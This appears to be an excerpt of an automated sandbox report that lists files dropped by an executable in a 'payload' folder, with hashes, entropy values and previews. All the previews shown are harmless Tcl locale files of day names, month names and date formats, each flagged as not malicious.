                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn DAYS_OF_WEEK_ABBREV [list \.. "\u09b0\u09ac\u09bf"\.. "\u09b8\u09cb\u09ae"\.. "\u09ae\u0999\u0997\u09b2"\.. "\u09ac\u09c1\u09a7"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf"\.. "\u09b6\u09c1\u0995\u09cd\u09b0"\.. "\u09b6\u09a8\u09bf"].. ::msgcat::mcset bn DAYS_OF_WEEK_FULL [list \.. "\u09b0\u09ac\u09bf\u09ac\u09be\u09b0"\.. "\u09b8\u09cb\u09ae\u09ac\u09be\u09b0"\.. "\u09ae\u0999\u0997\u09b2\u09ac\u09be\u09b0"\.. "\u09ac\u09c1\u09a7\u09ac\u09be\u09b0"\.. "\u09ac\u09c3\u09b9\u09b8\u09cd\u09aa\u09a4\u09bf\u09ac\u09be\u09b0"\.. "\u09b6\u09c1\u0995\u09cd\u09b0\u09ac\u09be\u09b0"\.. "\u09b6\u09a8\u09bf\u09ac\u09be\u09b0"].. ::msgcat::mcset bn MONTHS_ABBREV [list \.. "\u099c\u09be\u09a8\u09c1\u09df\u09be\u09b0\u09c0"\.. "\u09ab\u09c7\u09ac\u09cd\u09b0\u09c1\u09df\u09be
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):265
                                                                                                                                                                                                                                            Entropy (8bit):4.868201122972066
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xovtvfluo/E3v6xyFjovto+3vflm68vn:4EnLB383UtvfltE3v6g8tF3vflm6+n
                                                                                                                                                                                                                                            MD5:B91BB2ABC23B90962D2070B9588F2AB5
                                                                                                                                                                                                                                            SHA1:CBB4E9CD600773792C6E9F3E6B27E99C1846B44F
                                                                                                                                                                                                                                            SHA-256:B3D8A4632290B0F3DA690E47C1FDF06A8B9E171A96E938AFDB0DD52CF806CE54
                                                                                                                                                                                                                                            SHA-512:932FC4B8C3CA72731187D56012AD7DD7777C4D447F16EEB17B9D68235C9590DF99992FD22B8D7C85A843A610F93CD36FAFA993C34C441255A1C0A93C73BC5FE4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset bn_IN DATE_FORMAT "%A %d %b %Y".. ::msgcat::mcset bn_IN TIME_FORMAT_12 "%I:%M:%S %z".. ::msgcat::mcset bn_IN DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1152
                                                                                                                                                                                                                                            Entropy (8bit):4.2880653012847985
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83FMVBNfPg+g+RjMu5+C6MB4zdiwvWvn:432g6jh65zd3gn
                                                                                                                                                                                                                                            MD5:72DDD60C907DD235BCE4AB0A5AEE902C
                                                                                                                                                                                                                                            SHA1:06150F793251687E6FBC3FDA3BC81BCBFC7DE763
                                                                                                                                                                                                                                            SHA-256:3BE295DCC8FCDC767FED0C68E3867359C18E7E57D7DB6C07236B5BC572AD328E
                                                                                                                                                                                                                                            SHA-512:3B0A85003692F1E46185D5CC09236D2DA5E6D29166C9812D07A7D6BF6AC6C3B0708F91C6899768D4DBA3528081B8B43E09F49622B70F1CF991AFAC5352B6BA37
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ca DAYS_OF_WEEK_ABBREV [list \.. "dg."\.. "dl."\.. "dt."\.. "dc."\.. "dj."\.. "dv."\.. "ds."].. ::msgcat::mcset ca DAYS_OF_WEEK_FULL [list \.. "diumenge"\.. "dilluns"\.. "dimarts"\.. "dimecres"\.. "dijous"\.. "divendres"\.. "dissabte"].. ::msgcat::mcset ca MONTHS_ABBREV [list \.. "gen."\.. "feb."\.. "mar\u00e7"\.. "abr."\.. "maig"\.. "juny"\.. "jul."\.. "ag."\.. "set."\.. "oct."\.. "nov."\.. "des."\.. ""].. ::msgcat::mcset ca MONTHS_FULL [list \.. "gener"\.. "febrer"\.. "mar\u00e7"\.. "abril"\.. "maig"\.. "juny"\.. "juliol"\.. "agost"\.. "setembre"\.. "octubre"\.. "novembre"\.. "desembre"\.. ""].. ::msg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1354
                                                                                                                                                                                                                                            Entropy (8bit):4.466447248030554
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83U4nZ4yJTkkG3mYWEZqO1R3DNBEVG+PYhxrU4UF3ecCvt7/v3e6:43TJTGmnEZqE5/EVEDOGtDp
                                                                                                                                                                                                                                            MD5:F32EAD82CC26754C5A8E092873A28DB3
                                                                                                                                                                                                                                            SHA1:325124660F62242B24623B4B737CB4616F86CFF3
                                                                                                                                                                                                                                            SHA-256:AFEA12A16A6FA750EA610245133B90F178BA714848F89AEC37429A3E7B06BE1A
                                                                                                                                                                                                                                            SHA-512:04E335AAFBF4D169983635FC87BCFFE86FBA570A3E1820D20240EF7B47E7A3CD94AE3598543DCE92A1F82B5146CAAD982EFE9490EFD9E581D58515CFC3930581
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset cs DAYS_OF_WEEK_ABBREV [list \.. "Ne"\.. "Po"\.. "\u00dat"\.. "St"\.. "\u010ct"\.. "P\u00e1"\.. "So"].. ::msgcat::mcset cs DAYS_OF_WEEK_FULL [list \.. "Ned\u011ble"\.. "Pond\u011bl\u00ed"\.. "\u00dater\u00fd"\.. "St\u0159eda"\.. "\u010ctvrtek"\.. "P\u00e1tek"\.. "Sobota"].. ::msgcat::mcset cs MONTHS_ABBREV [list \.. "I"\.. "II"\.. "III"\.. "IV"\.. "V"\.. "VI"\.. "VII"\.. "VIII"\.. "IX"\.. "X"\.. "XI"\.. "XII"\.. ""].. ::msgcat::mcset cs MONTHS_FULL [list \.. "leden"\.. "\u00fanor"\.. "b\u0159ezen"\.. "duben"\.. "kv\u011bten"\.. "\u010derven"\.. "\u010dervenec"\.. "srpen"\.. "z\u00e1\u0159\u00ed"\.. "\u0159\u00edjen"\..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1208
                                                                                                                                                                                                                                            Entropy (8bit):4.315504392809956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83wV0tBVYuorIsmZ5meAxyISjTHU92WFVwpwvbvT:43w+DiuorreAY0zw8rT
                                                                                                                                                                                                                                            MD5:27A6A8BE8903AEF9D0BE956906A89583
                                                                                                                                                                                                                                            SHA1:EE29FDF67CB3AE150DF6BBBE603C1C3F5DA28641
                                                                                                                                                                                                                                            SHA-256:0D422A991BCA13FE9033118691CFEDAB0F372222EBB0BC92BAF8E914EE816B84
                                                                                                                                                                                                                                            SHA-512:0E702A679AD94BF479226B7DE32077562F3F95210F6453AE564138386DBB179941BA5359AEE9AC532F4A6E5BE745D6962D6B638A21DD48B865716F2FD2A0CB01
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset da DAYS_OF_WEEK_ABBREV [list \.. "s\u00f8"\.. "ma"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f8"].. ::msgcat::mcset da DAYS_OF_WEEK_FULL [list \.. "s\u00f8ndag"\.. "mandag"\.. "tirsdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f8rdag"].. ::msgcat::mcset da MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset da MONTHS_FULL [list \.. "januar"\.. "februar"\.. "marts"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "august"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat::mcset da B
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1276
                                                                                                                                                                                                                                            Entropy (8bit):4.349293509679722
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83cFNSsZKKgXum47fpK2OaSIui7dHqWZ0ZIBFJWJvvvWIn:43InZKKgXoOqx1W67W9XWIn
                                                                                                                                                                                                                                            MD5:EE3963A5F7E29C05C9617BE3FD897114
                                                                                                                                                                                                                                            SHA1:0F978CA174DF596817F872B5EF1B447B9DFE651C
                                                                                                                                                                                                                                            SHA-256:4C27733502066E8391654D1D372F92BF0484C5A3821E121AE8AA5B99378C99AE
                                                                                                                                                                                                                                            SHA-512:EA933709C68F8199858A1CC1FFDA67EE7458CC57A163E672535EB0B4C37BFDC200604C7506748DAC3158B6CA63C2F076A2C6252B2A596E59F83D3B1D4BC9C901
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de DAYS_OF_WEEK_ABBREV [list \.. "So"\.. "Mo"\.. "Di"\.. "Mi"\.. "Do"\.. "Fr"\.. "Sa"].. ::msgcat::mcset de DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mrz"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de BCE "v.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):847
                                                                                                                                                                                                                                            Entropy (8bit):4.412930056658995
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR831sMm47fpK2++SIui7dHqWZ0ZItovGvzvW:431h+mx1Wm+QjW
                                                                                                                                                                                                                                            MD5:A6227CD4F7434952D093F1F3C64B4378
                                                                                                                                                                                                                                            SHA1:0DDB9A49CB83DDF2396B2ECA85093260710496C2
                                                                                                                                                                                                                                            SHA-256:1C02D14140196623297F858E2EEF00B4159E1C6FAFE044EC65A48C9C24D46540
                                                                                                                                                                                                                                            SHA-512:D63F34024356F5CE0335D14EA557F4BBF238CCA8265DD27C039C70F7F28FE737F368B030DEE10B2C536512D2815E1F5B19838D08745C6A76A39050D573597EB3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_AT MONTHS_ABBREV [list \.. "J\u00e4n"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_AT MONTHS_FULL [list \.. "J\u00e4nner"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::msgcat::mcset de_AT DATE_FORMAT "%Y-%m-%d".. ::msgcat::mcset de_AT TIME_FORMAT "%T".. ::msgcat::mcset de_AT TIME_FORMAT_12 "%T".. ::msgcat::mcset de_AT DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1276
                                                                                                                                                                                                                                            Entropy (8bit):4.389082225723362
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83B8VSysVB8VsZKKgJ5Mm47fpK26aSIui7dHqWZ0ZIlj5VevjevbDvW:43Bt1VBbZKKgJs6qx1Wc5VojobzW
                                                                                                                                                                                                                                            MD5:C351057D8E5328C0790901D1F4DBEC9F
                                                                                                                                                                                                                                            SHA1:F73DE8AEF7F8083B0726760AA003E81067A68588
                                                                                                                                                                                                                                            SHA-256:532845CD15EC821C1939D000C648694A64E8CA8F0C14BAD5D79682CF991481CE
                                                                                                                                                                                                                                            SHA-512:8152AD082D0A6A4EBE7E1CCA9D4A5F2E48ABE3F09F4385A517C523A67CA3B08E0F20C193D0F6850F37E55ED0CD6FBD201FE22CC824AF170976D04DB061212F2D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset de_BE DAYS_OF_WEEK_ABBREV [list \.. "Son"\.. "Mon"\.. "Die"\.. "Mit"\.. "Don"\.. "Fre"\.. "Sam"].. ::msgcat::mcset de_BE DAYS_OF_WEEK_FULL [list \.. "Sonntag"\.. "Montag"\.. "Dienstag"\.. "Mittwoch"\.. "Donnerstag"\.. "Freitag"\.. "Samstag"].. ::msgcat::mcset de_BE MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "M\u00e4r"\.. "Apr"\.. "Mai"\.. "Jun"\.. "Jul"\.. "Aug"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Dez"\.. ""].. ::msgcat::mcset de_BE MONTHS_FULL [list \.. "Januar"\.. "Februar"\.. "M\u00e4rz"\.. "April"\.. "Mai"\.. "Juni"\.. "Juli"\.. "August"\.. "September"\.. "Oktober"\.. "November"\.. "Dezember"\.. ""].. ::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2304
                                                                                                                                                                                                                                            Entropy (8bit):4.371322909589862
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR833v+ZYYWtv+nWfFyL1NYOg+EKVJQ19tWQYmYaYRn9sWuSAJIJ6eRa6WrmdlX:43/pZyLjY0uYR9QmdkjC9r
                                                                                                                                                                                                                                            MD5:7DD14B1F4FF532DCAF6D4C6F0DF82E9A
                                                                                                                                                                                                                                            SHA1:707875FEF4207EBB71D066FDC54C7F68560C6DAD
                                                                                                                                                                                                                                            SHA-256:8B23E0E2F0F319BB9A2DFDCCDC565FF79A62FA85094811189B6BC41594232B6B
                                                                                                                                                                                                                                            SHA-512:5ECA072DE5DD7890270AE268C7C8D40EE2DB6966643604D16E54194DB0AD74FDA8D04848331E61B387E8B494AF18252E38671D939069EC4C90C672A629563B88
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset el DAYS_OF_WEEK_ABBREV [list \.. "\u039a\u03c5\u03c1"\.. "\u0394\u03b5\u03c5"\.. "\u03a4\u03c1\u03b9"\.. "\u03a4\u03b5\u03c4"\.. "\u03a0\u03b5\u03bc"\.. "\u03a0\u03b1\u03c1"\.. "\u03a3\u03b1\u03b2"].. ::msgcat::mcset el DAYS_OF_WEEK_FULL [list \.. "\u039a\u03c5\u03c1\u03b9\u03b1\u03ba\u03ae"\.. "\u0394\u03b5\u03c5\u03c4\u03ad\u03c1\u03b1"\.. "\u03a4\u03c1\u03af\u03c4\u03b7"\.. "\u03a4\u03b5\u03c4\u03ac\u03c1\u03c4\u03b7"\.. "\u03a0\u03ad\u03bc\u03c0\u03c4\u03b7"\.. "\u03a0\u03b1\u03c1\u03b1\u03c3\u03ba\u03b5\u03c5\u03ae"\.. "\u03a3\u03ac\u03b2\u03b2\u03b1\u03c4\u03bf"].. ::msgcat::mcset el MONTHS_ABBREV [list \.. "\u0399\u03b1\u03bd"\.. "\u03a6\u03b5\u03b2"\.. "\u039c\u03b1\u03c1"\.. "\u0391\u03c0\u03c1"\.. "\u039c\u03b1\u03ca"\.. "\u0399\u03bf\u
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):307
                                                                                                                                                                                                                                            Entropy (8bit):4.896073290907262
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoCwmGjbmvFjoCws6W3v1oCws6W3v6p6HyFjoCwmT+3vjbe:4EnLB383QrmdSs6W3vss6W3v6QSoJ3ve
                                                                                                                                                                                                                                            MD5:5B31AD8AC0000B01C4BD04BF6FC4784C
                                                                                                                                                                                                                                            SHA1:F55145B473DDCAE38A0F7297D58B80B12B2A5271
                                                                                                                                                                                                                                            SHA-256:705C66C14B6DE682EC7408EABDBA0800C626629E64458971BC8A4CBD3D5DB111
                                                                                                                                                                                                                                            SHA-512:1CCE6BCAE5D1F7D80E10687F0BCA2AE1B2DD53F04A0F443DC9B552804D60E708E64326B62BA4E3787325D89837B4AC8CCCA9AF6F39CBD654BCC8A9C27EA63BB8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_AU DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_AU TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_AU TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_AU DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):312
                                                                                                                                                                                                                                            Entropy (8bit):4.870560620756039
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoCr3FuoCsX3vtfNrsoCsX3v6YNIdjoCs+3v3FnN9vn:4EnLB383H3Fb3vtNN3v6y43v3FnNNn
                                                                                                                                                                                                                                            MD5:DDA87ACED97F9F7771788A1A0A1E4433
                                                                                                                                                                                                                                            SHA1:E221653CD659C095098180344654770FF059331B
                                                                                                                                                                                                                                            SHA-256:BC87754A253C1036E423FA553DA182DBC56F62A13EDA811D8CD9E8AFA40404A6
                                                                                                                                                                                                                                            SHA-512:BB95D9241B05686CA15C413746DD06071635CB070F38847BE9702397A86C01A3D54DEBE1ACAA51834AB74DB8D0F75E353995183864E382721425756EE46B0B1E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BE DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_BE TIME_FORMAT "%k:%M:%S".. ::msgcat::mcset en_BE TIME_FORMAT_12 "%k h %M min %S s %z".. ::msgcat::mcset en_BE DATE_TIME_FORMAT "%d %b %Y %k:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.915769170926952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xosmGMoss6W3v6ay/5osmT+3vR6HyFvn:4EnLB383hr8s6W3v6ay/hJ3voSVn
                                                                                                                                                                                                                                            MD5:4CBF90CE15ECCB6B695AA78D7D659454
                                                                                                                                                                                                                                            SHA1:30C26ADB03978C5E7288B964A14B692813D6E0B8
                                                                                                                                                                                                                                            SHA-256:EC48F18995D46F82B1CC71EA285174505A50E3BA2017BCCE2D807149B7543FD0
                                                                                                                                                                                                                                            SHA-512:CC809EBD1B2B5D9E918C2E2CE4E7075DFB0744C583F17C1C234D8437EF0C34654D2F09FF77544AD3430CEC78ABC70AA5F85F71AD1489A687B8087FCDFE07B088
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_BW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_BW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_BW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):295
                                                                                                                                                                                                                                            Entropy (8bit):4.87629705076992
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoAhgqyFjoAZF3vX5oAZF3v6cvBoAh9+3vnFDL8vn:4EnLB383FhgqWDZF3vVZF3v6cvdhI3vM
                                                                                                                                                                                                                                            MD5:BFC4A48F5B10D137A4D32B440C47D3C6
                                                                                                                                                                                                                                            SHA1:C90EF2A8291DE589BC12D0A5B8AF2F0B00FEB7CD
                                                                                                                                                                                                                                            SHA-256:3CF2D0937FD95264549CF5C768B898F01D4875A3EB4A85D457D758BC11DFEC6E
                                                                                                                                                                                                                                            SHA-512:A91B81A956A438CA7274491CA107A2647CBDFB8AEB5FD7A58238F315590C74F83F2EBA4AA5C4E9A4A54F1FC1636318E94E5E4BBEA467326E0EACED079741E640
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_CA DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_CA TIME_FORMAT "%r".. ::msgcat::mcset en_CA TIME_FORMAT_12 "%I:%M:%S %p".. ::msgcat::mcset en_CA DATE_TIME_FORMAT "%a %d %b %Y %r %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.892405843607203
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEbtvqyFjoELE3vLjoELE3v6mjoEbto+3vnFDoAkvn:4EnLB383BbtvqWHLE3vTLE3v6EbtF3vW
                                                                                                                                                                                                                                            MD5:52E55DE8C489265064A01CEEC823DCDD
                                                                                                                                                                                                                                            SHA1:16F314A56AE0EAC9DAD58ADDEA6B25813A5BAA05
                                                                                                                                                                                                                                            SHA-256:C2CE5B74F9E9C190B21C5DF4106303B7B794481228FB9A57065B9C822A1059C3
                                                                                                                                                                                                                                            SHA-512:6010F29BF75D0CB4EE4F10781423A8CC68D5018DE8C633CD1217A7FE1299A0532E8C0E5D120188B748171EB255C587BB0B64B7384A58F725F3B6A4B9EA04393E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_GB DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_GB TIME_FORMAT "%T".. ::msgcat::mcset en_GB TIME_FORMAT_12 "%T".. ::msgcat::mcset en_GB DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.851471679101967
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoa+joaQ9PoaAx/G4soaYYW3v6ay/5oaAx/T+3v4x6HyFvn:4EnLB383BSiF4KxW3v6ay/B/3v4ISVn
                                                                                                                                                                                                                                            MD5:DE2A484508615D7C1377522AFF03E16C
                                                                                                                                                                                                                                            SHA1:C27C0D10E7667AD95FFF731B4E45B2C6E665CC36
                                                                                                                                                                                                                                            SHA-256:563450A38DB6C6A1911BC04F4F55B816910B3E768B1465A69F9B3BD27292DBEE
                                                                                                                                                                                                                                            SHA-512:A360B0FD7E36BCC0FB4603D622C36199E5D4C705396C6701F29730EB5CB33D81B208541CADFAED5303FC329C7C6A465D23CA9584F0DEC2DE128E258478DD6661
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_HK AM "AM".. ::msgcat::mcset en_HK PM "PM".. ::msgcat::mcset en_HK DATE_FORMAT "%B %e, %Y".. ::msgcat::mcset en_HK TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_HK DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):286
                                                                                                                                                                                                                                            Entropy (8bit):4.833246107458447
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoK6qyFjoKi+3vLjoKi+3v6mjoKv+3vnFDoAkvn:4EnLB383CqW13vJ3v6b3v9dmn
                                                                                                                                                                                                                                            MD5:57F0BBE1316D14BC41D0858902A7980A
                                                                                                                                                                                                                                            SHA1:B68BF99A021B9F01FE69341DF06F5D1453156A97
                                                                                                                                                                                                                                            SHA-256:9E0DCEE86A03B7BDD831E0008868A9B874C506315BF01DF3982AD3813FD3BA8E
                                                                                                                                                                                                                                            SHA-512:864F32254AAD39859AFC47D0C90DC5F38CA86EF0BBC7DE61BE253756C22B7806E616B59802C4F4D7B2F5543BF7C070FFF6FAF253E0A337EC443337E63A2E5A57
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_IE DATE_FORMAT "%d/%m/%y".. ::msgcat::mcset en_IE TIME_FORMAT "%T".. ::msgcat::mcset en_IE TIME_FORMAT_12 "%T".. ::msgcat::mcset en_IE DATE_TIME_FORMAT "%a %d %b %Y %T %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):318
                                                                                                                                                                                                                                            Entropy (8bit):4.80637980762728
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoKr3ujoKrGtoKr5vMoKrw3v1oKr5o+3voAsvn:4EnLB383T9xvT3vJF3vonn
                                                                                                                                                                                                                                            MD5:1A54E506E70B2125C6016B373D3DD074
                                                                                                                                                                                                                                            SHA1:15289902BAA93208D8FB224E119166D0E044E34E
                                                                                                                                                                                                                                            SHA-256:ADEA3A1AB8AA84237DDB2F276ABDB96DCB4C51932E920D1A5E336904E1138664
